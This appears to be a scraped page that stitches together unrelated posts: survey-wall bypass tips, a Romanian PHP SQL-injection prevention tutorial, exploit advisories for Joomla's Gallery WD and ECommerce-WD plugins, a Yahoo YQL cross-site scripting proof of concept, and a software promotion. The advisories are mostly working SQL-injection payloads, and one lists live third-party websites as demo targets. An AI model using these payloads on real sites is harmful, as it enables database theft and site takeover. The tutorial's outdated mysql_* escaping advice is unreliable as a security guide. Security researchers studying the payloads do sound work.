Search the Community

First Method: Add this Chrome Extension or Firefox Add on to remove any Survey From your Browser Annoyed by the surveys you have to click on to see the “really cool stuff”? Annoyed by the surveys you have to fill out? This application gives you an option to block surveys automatically when they are detected, and automatically removes them if you came from a Facebook page. Note that it doesn’t work perfectly on everything, but it should work on most pages. This app works great with https://chrome.google.com/extensions/detail/ceoahfhinjgldgpfkjmjghpaidolbeag Firefox users can go to http://userscripts.org/scripts/show/71877 for another version. If you are afraid that this has a virus or any other malicious code, you can view the source code at http://userscripts.org/scripts/review/71877 SECOND METHOD IS TO DISABLE THE SCRIPT OF YOUR BROWSER: INSTRUCTIONS FOR GOOGLE CHROME BROWSER : In Google Chrome Click on the little spanner icon in the right And then Select Options. When the Options window Opens Select Content Settings. Now Click on JavaScript in the top toolbar, And Select Do Not Allow any site to run JavaScript, Now click close and refresh the webpage, It should open up and show you its content without requesting that you do a survey. Once you have finished looking at the webpage repeat the above steps except this time choose Allow All Sites to run JavaScript otherwise some sites won’t work. INSTRUCTIONS FOR MOZILLA FIREFOX BROWSER : Firefox Click on tools in the top toolbar, and then select Options. Now when the options open select the content tab, When it opens uncheck the box, that says enable JavaScript and select Ok. Now go back to the website and refresh it, the website should show you its content without a survey, Once done you will need to repeat these steps but click enable JavaScript as Facebook will not work correctly without it. INSTRUCTIONS FOR INTERNET EXPLORER BROWSER : To disable the surveys in Internet Explorer click on tools in the top right hand corner and then select Internet Options. When the options open select the Security Tab and then press the custom Levels Button. Scroll Down to Scripting And Disable the Java Options. Refresh the webpage and it should open fine without showing any surveys. When you have finished looking at the webpage enable scripting again so that you can view Facebook correctly. It may not work on few PPD sites but mostly works on the JavaScript supported Popups and Surveys. THIRD AND VERY POPULAR METHOD TO BYPASS ONLINE SURVEYS: I have found that Survey-remover.com, formerly known as XJZ Survey Remover. This bookmarklet was designed to show protected areas on websites. Removes surveys most of the time but it doesn’t work if the survey leads to a download (sharecash). Works on Mozilla Firefox and Google Chrome. For more details, please visit this website: Get the bookmarklet, learn about surveys and discover how to get money now by completing surveys online - XJZ Survey Remover So these are the Only available methods on Internet to Bypass any Online Surveys to Download a File by Chrome Extension,Disabling Javascript and Using Survey Remove.com.If it Does not Work then Don’t be fooled by any other solution(Software to Bypass survey) which also takes a Survey to Complete. source

1. Cum sa evitam SQL Injection (SQLi) De obicei acesta este folosit in linkuri de genul: site.tld/script.php?id=1 , adaugand dupa 1 o continuare a comanezii SQL. De exemplu: Code: (Select All) site.com/script.php?id=1 Acesta in cod arata cam asa: Code: (Select All) SELECT camp1,camp2 FROM tabel WHERE id=’1? Insa, putem adauga ceva acelui id, ceea ce va continua comanda noastra SQL: Code: (Select All) site.com/script.php?id=1’OR+id%3D’3? Asta, in codul SQL va arata asa: Code: (Select All) SELECT camp1,camp2 FROM tabel WHERE id=’1? OR id=’3? Bineinteles, acest exemplu nu este daunator, dar daca “hackerul” foloseste DROP sau DELETE, poate iesi urat. Cum se pot securiza acestea ? Simplu ! Aplicam stringului pe care il introducem in baza de date o functie, mysql_real_escape_string(), care inlocuieste toate caracterele care ar putea avea vreun efect asupra comenzii SQL. De exemplu: script.php Code: (Select All) $id = $_GET[‘id’]; $id = mysql_real_escape_string($id); $query = “SELECT camp1,camp2 FROM tabel WHERE id='”. $id .”‘”; Cel mai bine e sa luam toate datele in functie de ID (adica sa nu avem urluri gen useri.php?user=bogdan, ci useri.php?iduser=1) deoarece ID-uri, trebuie sa fie numere, lucru care se poate verifica foarte usor. Deci, datele le vom selecta dupa un anumit ID, care o sa fie numeric. Astfel, scriptul devine simplu: Code: $id = $_GET[‘id’]; if(!is_numeric($id)){ echo ‘ID-ul nu est numeric. Incercare de hacking ?? Politia a fost anuntata'; }else{ //este indicat sa verificati intai daca acel ID se afla in baza de date. folositi mysql_num_rows, iar daca rezultatul este 0, id-ul nu exista in baza de date //ceva de genul: $query = mysql_query(“SELECT camp1,camp2 FROM tabel WHERE id='”. $id .”‘”); if(mysql_num_rows($query)==0) { echo ‘ID-ul nu exista in baza de date. Anunt avocatul'; }else{ //totul e OK, id-ul e validat si exista in BD } } In principiu, pentru a valida un GET folositi urmatoarele 3 functii, in functie de caz: mysql_real_escape_string() – sau alternativa: addslashes() is_numeric() mysql_num_rows()

###################################################################### # Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability # Google Dork: inurl:option=com_gallery_wd # Date: 29.03.2015 # Exploit Author: CrashBandicot (@DosPerl) # Vendor HomePage: http://web-dorado.com/ # Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd # Tested on: Windows ###################################################################### parameter 'theme_id' in GET vulnerable # Example : # Parameter: theme_id (GET) # Type: error-based # GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # ==================================================================================== # parameter 'image_id' in POST vulnerable # Example : # URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2 # Parameter: image_id (POST) # Type: error-based # POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search # ~ Demo ~ # $> http://www.cnct.tg/ http://www.nswiop.nsw.edu.au/ http://cnmect.licee.edu.ro/ #EOF Source

Version 1.2.5 of the ECommerce-WD plugin for Joomla! has multiple unauthenticated SQL injections available via the advanced search functionality. http://extensions.joomla.org/extension/ecommerce-wd The vulnerable parameters are search_category_id, sort_order, and filter_manufacturer_ids within the following request: POST /index.php?option=com_ecommercewd&controller=products&task=displayproducts HTTP/1.1 Host: 172.31.16.49 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.31.16.49/index.php?option=com_ecommercewd&view=products&layout=displayproducts&Itemid=120 Cookie: 78fdafa5595397a1fc885bb2f0d74010=q1q1ud2sr0la18o5b38mkbdak2 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 321 product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Vectors: Parameter: filter_manufacturer_ids (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1) AND 8066=8066 AND (7678=7678&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1) AND (SELECT 7197 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(7197=7197,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1212=1212&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1) AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND (1480=1480&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Parameter: search_category_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) AND 3039=3039 AND (6271=6271&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(5158=5158,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8257=8257&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND (1251=1251&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x71706a6a71)-- &filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Parameter: sort_order (POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc,(SELECT (CASE WHEN (8973=8973) THEN 1 ELSE 8973*(SELECT 8973 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pagination_limit_start=0&pagination_limit=12 Type: AND/OR time-based blind Title: MySQL >= 5.0.11 time-based blind - ORDER BY, GROUP BY clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc,(SELECT (CASE WHEN (6064=6064) THEN SLEEP(5) ELSE 6064*(SELECT 6064 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pagination_limit_start=0&pagination_limit=12 Metasploit modules that exploit the UNION-based injection are available on ExploitHub: Enumerate users -- https://exploithub.com/joomla-e-commerce-wd-plugin-users-enumeration-via-sql-injection.html Read files -- https://exploithub.com/joomla-e-commerce-wd-plugin-file-download-via-sql-injection.html Write payload to web directory -- https://exploithub.com/joomla-e-commerce-wd-plugin-sql-injection.html -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website Source

/*********************************************************************************** ** Exploit Title: Yahoo Query Language Cross Site Scripting Vulnerability ** ** Exploit Author: Peyman D. aka C4T ** ** Vendor Homepage : http://query.yahooapis.com/ ** ** Google Dork: none ** ** Date: 2015-03-08 ** ** Tested on: Windows 7 / Mozila Firefox ** ************************************************************************************ ** Exploit Code: ****************** <html xmlns="http://www.w3.org/1999/xhtml"> <body> <span>Discovered by Peyman D.</span> <span>aka C4T</span> <script> alert('Successfully Exploited'); </script> </body> </html> ************************************************************************************ Location & Vulnerable query: ****************** http://query.yahooapis.com/v1/public/yql?q= select * from html where url='[attacker-website.com]/exploit.html' and xpath='html' ************************************************************************************* ** Proof: ****************** Executable script tag in API's own page: Malicious source: http://hatrhyme.com/alert.html Exploit query: http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/alert.html' and xpath='html' ------------------------------------------------------- Injecting HTML tags in API's own page: Malicious source: http://hatrhyme.com/expl.html Exploit query: http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/expl.html' and xpath='html' ------------------------------------------------------- ****************************************************************************************** ** ** Explanation and the cause of this vulnerability: ** ** http://hatrhyme.com/XSSInYQL.pdf ** ****************************************************************************************** Source

Product Description Get organized automatically Don’t spend time hunting down and organizing your files manually! Ashampoo Media Sync scans, identifies and organizes your media for you into categories (Documents, Music, Pictures, Video) – automatically. Files instantly organized No more file chaos! Just plug in your device. MediaSync will do the rest! Setting up takes only seconds Select input location. Select output location. Select file types. Done! Compatible with all autoplay-enabled devices CDs, DVDs, flash drives, smartphones, digital cameras and more. You name it, MediaSync supports it! The application consists of three main steps which you have to follow in order to sort your files. The first enables you to choose the source folder and the file category you want to sync (images, music, videos, documents), the second allows you to select the destination path and the third simply gives the all clear signal for the entire process. Ashampoo Media Sync can be used to synchronize content between mobile phones, tablets, external drives and so on, which makes it handy for scenarios in which you made a mess of things by copying stuff to the aforementioned devices without giving too much thought to sorting. Features: – Syncing happens in the background – Folder structures are preserved – File types are automatically recognized, files get organized into four categories (Documents, Music, Pictures, Video) – All auto-play-enabled devices are supported (CD, DVD, flash drives, smartphones, digital cameras and more) With Ashampoo Media Sync, organizing files is as easy as 1, 2, 3! 1. Select input location 2. Select output location 3. Select file types Ashampoo Media Sync will scan, identify and organize your media into categories for you (Documents, Music, Pictures, Video) – automatically, every time. -> Download <-Deal Expires in: EXPIRED!